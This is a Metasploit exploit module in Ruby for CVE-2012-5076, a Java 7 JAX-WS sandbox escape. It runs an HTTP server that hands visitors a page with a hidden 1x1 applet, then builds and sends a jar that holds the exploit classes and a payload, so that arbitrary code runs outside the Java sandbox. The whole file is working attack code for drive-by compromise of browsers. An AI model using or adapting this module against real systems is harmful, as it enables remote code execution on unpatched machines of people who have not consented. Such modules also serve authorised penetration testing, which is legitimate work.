##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
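class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Module metadata for CVE-2012-5076 (JAX-WS sandbox escape in Java 7).
  #
  # The module-level 'Platform' list must cover every target's platform: the
  # "Linux x86" target declares 'linux', so it is listed here alongside the
  # Java and Windows entries.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JAX-WS Remote Code Execution',
        'Description' => %q{
          This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
          code outside of the sandbox as exploited in the wild in November of 2012. The
          vulnerability affects Java version 7u7 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability Discovery
          'juan vazquez' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-5076' ],
          [ 'OSVDB', '86363' ],
          [ 'BID', '56054' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
        ],
        'Platform' => %w{java win linux},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Serve either the landing page or the applet jar, depending on the URI.
  #
  # Any request whose URI ends in ".jar" is answered with a freshly built jar
  # containing the payload plus the exploit classes. The HTML page references
  # a random jar name, so the jar's name itself is not validated here. Every
  # other request is first normalised to end with "/" via a redirect and then
  # receives the applet HTML.
  #
  # @param cli     connected HTTP client handed in by the HttpServer mixin
  # @param request parsed HTTP request for that client
  def on_request_uri(cli, request)
    unless request.uri.match?(/\.jar$/i)
      unless request.uri.match?(/\/$/)
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("#{self.name} handling request")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    # Build the payload before touching the jar: regenerate_payload returns
    # nil when no payload could be generated for this client, and calling
    # encoded_jar on nil would raise inside the HTTP server loop.
    p = regenerate_payload(cli)
    if p.nil?
      print_error("Failed to generate the payload")
      send_not_found(cli)
      return
    end

    jar = p.encoded_jar

    # Class files shipped with the framework that are added to the payload
    # jar. Each entry is a list of path segments so that nested package
    # directories can be created by the loop below.
    paths = [
      [ "Exploit.class" ],
      [ "MyPayload.class" ]
    ]

    paths.each do |path|
      # Create intermediate directory entries for nested paths unless the jar
      # already has them (a no-op for the single-segment paths above).
      1.upto(path.length - 1) do |idx|
        dir = path[0, idx].join("/") + "/"
        jar.add_file(dir, '') unless jar.entries.map(&:name).include?(dir)
      end

      # File.binread releases the handle even if the read raises, unlike the
      # manual open/read/close sequence it replaces.
      class_file = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076", *path)
      jar.add_file(path.join("/"), File.binread(class_file))
    end

    print_status("Sending Applet.jar")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  # Build the landing page: a 1x1 applet whose archive is a random .jar name.
  #
  # The name is random per page load; on_request_uri serves the jar for any
  # URI ending in ".jar", so the page and the server need not agree on it.
  #
  # @return [String] HTML document embedding the applet
  def generate_html
    jar_name = rand_text_alpha(rand(3..8)) + ".jar"
    html = "<html><head></head>"
    html += "<body>"
    html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
    html += "</applet></body></html>"
    return html
  end
end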